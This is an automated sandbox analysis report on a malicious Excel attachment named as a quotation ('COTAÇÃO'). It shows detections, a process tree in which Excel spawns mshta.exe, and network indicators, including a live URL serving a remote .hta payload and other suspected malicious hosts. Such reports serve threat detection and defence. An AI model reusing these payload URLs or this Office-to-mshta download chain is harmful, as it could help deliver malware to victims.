Windows Analysis Report
COTA#U00c7#U00c3O.xls

Overview

General Information

Sample name: COTA#U00c7#U00c3O.xls
renamed because original name is a hash value
Original sample name: COTAO.xls
Analysis ID: 1634262
MD5: 3f6b0fddaa94e07440a3890afc3dc99c
SHA1: 2c963eb3944bc4be5892e6ef95283e2b8b9bcaf1
SHA256: d4819f6ce1e7c5ed703e11e3ae98ebfb04abe95ac2a221bcc43696de923bdbb2
Tags: xls user-abuse_ch

Detection

Score: 56
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Microsoft Office Child Process
AV process strings found (often used to terminate AV products)
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables security privileges
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May use bcdedit to modify the Windows boot settings
One or more processes crash
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 7468 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 5868 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 8112 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
    • WerFault.exe (PID: 6388 cmdline: C:\Windows\system32\WerFault.exe -u -p 7468 -s 4084 MD5: 5A849C27C4796C1A7C22C572D8EAF95D)
      • EXCEL.EXE (PID: 3716 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /restore MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • WerFault.exe (PID: 2192 cmdline: C:\Windows\system32\WerFault.exe -u -p 7468 -s 1976 MD5: 5A849C27C4796C1A7C22C572D8EAF95D)
  • EXCEL.EXE (PID: 7404 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\COTA#U00c7#U00c3O.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7468, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 5868, ProcessName: mshta.exe
Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton | Data: DestinationIp: 5.161.200.29, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7468, Protocol: tcp, SourceIp: 192.168.2.26, SourceIsIpv6: false, SourcePort: 49937
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.26, DestinationIsIpv6: false, DestinationPort: 49937, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7468, Protocol: tcp, SourceIp: 5.161.200.29, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

AV Detection

Source: COTA#U00c7#U00c3O.xls | Virustotal: Detection: 25%
Source: COTA#U00c7#U00c3O.xls | ReversingLabs: Detection: 21%
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 13.107.246.76:443 -> 192.168.2.26:49943 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.246.76:443 -> 192.168.2.26:49944 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\System32\mshta.exe
Source: global traffic | DNS query: name: browser.events.data.msn.cn
Source: global traffic | DNS query: name: st3.pro
Source: global traffic | DNS query: name: link.saja.market
Source: global traffic | DNS query: name: otelrules.svc.static.microsoft
Source: Joe Sandbox View | IP Address: 13.107.246.76
Source: Joe Sandbox View | IP Address: 3.39.89.152
Source: Joe Sandbox View | IP Address: 5.161.200.29
Source: Joe Sandbox View | JA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global traffic | HTTP traffic detected:
  GET /YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: st3.pro
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /qORxZFFRU3 HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Connection: Keep-Alive
  Host: link.saja.market
Source: global traffic | HTTP traffic detected:
  GET /xampp/umo/ncr/onceufeelgood.hta HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Connection: Keep-Alive
  Host: 172.245.191.88
Source: unknown | TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: browser.events.data.msn.cn
Source: global traffic | DNS traffic detected: DNS query: st3.pro
Source: global traffic | DNS traffic detected: DNS query: link.saja.market
Source: global traffic | DNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC8A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://172.245.191.88/xampp/umo/ncr/onceufeelgood.hta
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.com.cn/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.com/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.com/autodiscover/autodiscover.xmlwD
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.es/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.es/autodiscover/autodiscover.xmlgB
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.fr/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.fr/autodiscover/autodiscover.xmloB
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.in/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.in/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.it/Autodiscover/Autodiscover.xmlGD
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.it/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.online/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.online/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.sg/Autodiscover/Autodiscover.xml/D
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.sg/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.uk/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.uk/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.xyz/Autodiscover/Autodiscover.xmlgG
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.xyz/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://broadcast.officeapps.live.com/m/broadcasthost.asmxinf
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net0
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.osi.office.net/OfficeEntity/web/views/juno.desktop.cshtmltmlj
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/0t
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/3
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/3.
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/abice
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/%s/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/L
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4130078724.00000121DB04D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies??
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA957000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA957000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyp
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx1
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx3S
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cloudimanage.com
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cloudimanage.com/
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cloudimanage.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/iMa
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cloudimanage.com/m365/oauth2/callback
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/Office0
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contentstorage.osi.office.net/%s/%s3p
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.ai
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.ai/api
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.aik
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.ail
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cr.office.com
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.docs.live.net
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.docs.live.netK
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileFilecyTi
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com~
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFiler
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEx
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciests
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://designerapp.azurewebsites.net
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://designerapp.azurewebsites.netV
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DADBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://designerappservice.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev.cortana.ai
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev.cortana.aip
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/int
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://directory.services.
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://directory.services.live.com/profile/Profile.asmx.asmx
Source: EXCEL.EXE, 00000000.00000002.4110954710.00000121CA3FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.live.net/skydocsservice.svc3B
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v1/Designer0
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4114391032.00000121D7F32000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Office/excel/16.0.18129.20158/Production/CC?&EcsCanary=1&Clientid=
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Office/excel/16.0.18129.20158/Production/CC?&EcsCanary=1&Clientid=%
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com:443/config/v2/Office/excel/16.0.18129.20158/Production/CC?&EcsCanary=1&Client
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1VGl
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1p
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1?
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/j
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/t
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comces/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comces//
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entity.osi.office.net/t
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excelcs.officeapps.live.com/xlauto/excelautomation.svc/XlAutomation
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excelsgs.officeapps.live.com/xlfrontdoor/FrontDoor.ashx
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://explore.live.com/homehttps://odc.officeapps.live.com/odc/stat/images/sm/liveconnect_16_1.png
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/Pages/DesignPage.aspx
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/Pages/DesignPageV2.aspx
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/Pages/DesignPageV2.aspx?lang=
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/formapi/api/
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fs.microsoft
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fs.microsoftw
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.ppe.windows.net
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.ppe.windows.net/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/&
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/b
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/me?api-version=1.6-
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.netL
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com/mediasvc/api/media/log
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com/mediasvc/api/media/oembed
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comationusel
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comlients/inapp
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA3E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetrystOfficeOnlineContenthttps://insertmedi
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=iconsOffice
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimagesEx
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/videopickerker
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://identity.osi.office.net/v1/tokenken0
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.com0m
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comfile
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comom02
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comrs3
